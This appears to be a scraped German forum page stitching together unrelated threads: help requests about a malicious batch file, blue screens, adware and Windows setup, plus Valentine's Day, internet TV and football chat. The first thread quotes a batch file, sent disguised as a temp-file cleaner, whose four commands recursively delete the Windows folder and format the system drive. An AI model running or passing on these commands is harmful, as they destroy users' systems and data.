Schnelle Hilfe benötigt!!! Batch-Virus hat Windows Systemdateien gelöscht! Will PC nicht neustarten!

Hi,
sorry für das drengen im Thema titel aber n vermeintlicher kumpel von mir hat mir ne batch Datei geschickt die nach seinen angaben die ganzen Temprorären Dateien löscht.

Sowas habe ich schonmal bei Chip oder so als Download gesehen.

Ich, kaputt wie ich von diesem für mich ansterengenen Tag bin prüfe den Inhalt der Batch nicht und klicke drauf.

Plötzlich kommen meldungen in der batch
C:\Windows\\ka\ka.* gelöscht
C:\Windows\\ka\ka.* gelöscht
C:\Windows\\ka\ka.* gelöscht
C:\Windows\\ka\ka.* gelöscht
C:\Windows\\ka\ka.* gelöscht
C:\Windows\\ka\ka.* gelöscht
Sofort breche ich die Datei ab und schau mir den inhalt an:

RD /Q /S %systemroot%
DEL /F /S /Q %systemroot%
erase /F /S /Q %systemroot%
format %systemdrive%

Habe nachgelesen und alle 4 zeilen sind Befehle die ohne rückfrage dateien löschen mit diesen Parametern da.

Habe zwar gleich abgebrochen habe aber angst das wichtige Systemdateien gelöscht wurden.

Habe in der batch datei nur kurz was von C:\Windows\assembly gelesen und
secunden danach noch n anderer pfad.
Die Batch war c. a. 4 Secunden an.

Gibt es eine möglichkeit festzustellen welche Dateien gelöscht worden sind und diese wiederherzustellen?

Habe ne Windows VIsta Recovery disk (glaube aber die ist schon ne vollwertige da die Installation komplett normal leuft und danach keine zusatz programme installiert sind)

Bitte um rasche hilfe den:
Ich traue mich nicht den PC herrunter zu fahren da er dann vieleicht nichtmehr startet?

Ich hätte auch ne Knoppix life DVD da. (DIe is c. a. 1 Monat alt)
Wobei ich nicht 100% sicher bin das die funst.)

BAD_POOL_CALLER usw.

Bei meiner Schwester gibts wieder mal Probleme. ^^

In letzter Zeit kommen immer mal wieder (bisher) BSoDs.

Die Meldungen lauteten (die Meldung des ersten BSoDs konnt man nicht lesen, da “Neustarten” aktiviert war :rolleyes: ):
Oben stand, das Übliche: Windows hat ein Problem festgestellt bla bla bla.
Dann stand unter dem ersten Absatz: BAD_POOL_CALLER.
weiter unten dann die STOP Meldung:
*** STOP: 0x000000c2 (0x00000007, 0x0000113D, 0x0A03787, 0xA7D00C40)
Die Meldung des zweiten BSoDs:
Diesmal ohne BAD_POOL_CALLER:
*** STOP: 0x0000008E (0xC0000005, 0x00000000, 0x9880E710, 0x00000000)

Was bedeutet das?

Vor kurzem (vor einem Monat) wurde neuer RAM (Kingston) eingebaut.

MfG jason

Malware???

Tach Gemeinde.

Ich habe seit ein paar Tagen ein Problem mit der immer wiederkehrenden
Werbung auf meinem Firefox, trotz AdblockPlus.

Nach einiger Sucherei habe ich einen Autostarteintrag gefunden, den
ich nie installiert habe. Das Ding nennt sich oeswoge.exe.
(googelt mal nach oeswoge)
Wenn ich diesen Autostarteintrag lösche/deaktiviere ist er beim nächsten start
auch wieder mit dabei.

Insgesammt habe ich 4 Dateien mit dem dem Namen oeswoge auf dem Rechner
gefunden. (1x exe + 3x Video.Dat)
Löschen ist nicht möglich, da diese gerade verwendet wird.

Und jetzt das beste:
Ich komme auch nicht mehr in den Abgesicherten Modus und ins Bios. :8o:
Von dort wollte ich auch einen Löschversuch starten.

Eset nod + Ad Aware haben seltsamerweise nichts zu diesem
Eintrag gefunden. Nur schädliche Cookies, seit ich diesen eintrag auf dem rechner habe.

Wie bekomm ich jetzt das Sch…ding vom Rechner??
Ausser mit Format C…. 😉

Edit:
Lasse ich Tune up Process Manager nach geöffneten Dateien suchen,
hat das die selbe Wirkung, wie wenn ich den Resetknopf am Rechner drücke… :astonished:

Windows Setup

Guten Abend,

Ich habe ein Problem wenn ich Windows starte läd er wie normal dan kann ich wählen zwischen Windows Setup und Microsoft Windows XP so nach 3 sekunden started das Windows Setup automatisch das in einem blauen Fenster erscheint er möchte den SCSI -/Raid Treiber installieren er fängt an zu installieren dan steht da Datei “iaStor.sys” konnte nicht gefunden werden dan hält es an und es steht da Setup fehlgeschlagen weiter mit beliebiger Taste dan fängt alles von neuem wieder an

bitte um hilfe !

Valentinstag

Hallo ihr lieben
bald ist ja wieder der Tag der Verliebten!
Wollte mal fragen ob ihr den Tag irgendwie besonders verbringt, euch was schenkt oder es ein Tag wie jeder andere ist???

Für mich ist eigentlich jeder Tag den ich mit meinem Mann verbringen darf ein besonderer Tag!
Aber da Valentinstag ansteht hab ich ein Parfüm für ihn besorgt -Sun for Men da ich das aus versehen gebrochen habe und ich eh ein neues besorgt hätte! Wir werden abends essen gehen wie jedes Jahr!
Ansonsten ist es für mich eingentlich ein Tag wie jeder andere einfach ein Tag mehr um meinen Schatz zu zeigen wie sehr ich ihn liebe :lie:

So bin mal gespannt was ihr von dem “geldmachtag” der Komsumwelt haltet und was ihr an dem Tag macht!

LG Sarah

TV über Internet/Computer

Also,

Ich hätte folgende Frage:

Ist es grundlegend möglich (auf legalem Weg) über Internet Kabelfernsehen zu schauen?

Unser Kabelanbieter geht uns nämlich momentan auf die Nerven mit ständigen Störungen und Preiserhöhungen.

Ich wäre auch gewillt monatlich zu zahlen für das “Kabelfernsehn aus dem Internet”.
Auch wäre es kein Problem einen Rechner abzustellen der dann für das Fernsehen sorgt.

Danke für Antworten 😉

Babbel und der DFB-Trainerschein

Stuttgart – Der DFB bleibt im Fall Markus Babbel hart und weigert sich weiter, dem Teamchef des Bundesligisten VfB Stuttgart das Erwerben der Trainerlizenz zu erleichtern.

“Wir haben immer gesagt, dass es für Lothar Matthäus die letzte Sondergenehmigung gegeben hat. Man muss auch mal einen Schlussstrich ziehen. Das haben wir getan”, sagte Frank Wormuth, Leiter der DFB-Trainerausbildung, dem “Tagesspiegel am Sonntag”
sport1.de

Schöner Leserbrief von sport1.de:

Das gibt es nur im Fussball

In jedem Unternehmen der freien Wirtschaft interessiert es “keine Sau”, ob der Chef eine Ausbildung hat oder nicht. Nur der Erfolg zählt. Es gibt genügend ausgebildete Flachpfeifen, die keine Ahnung von dem haben, was sie tun und genügend “Laien” die erfolgreich sind. Ausgerechnet der Fussball masst sich an die Personalpolitik der Vereine zu bestimmen.

von Hans am 31.01. 2009

Viel anders sehe ich das auch nicht.
Gibt Sammer seinen “geschenkten” Trainerschein jetzt eigentlich
zurück?

Natürlich nicht, wozu auch.
Hat ja jetzt einen wichtigen Posten beim DFB.
Sollen sich mal lieber um den Nachwuchsbereich kümmern.
Da gibt es genug Arbeit.

Was man ohne Trainerschein schaffen kann sieht man ja bei Beckenbauer oder Cruyf.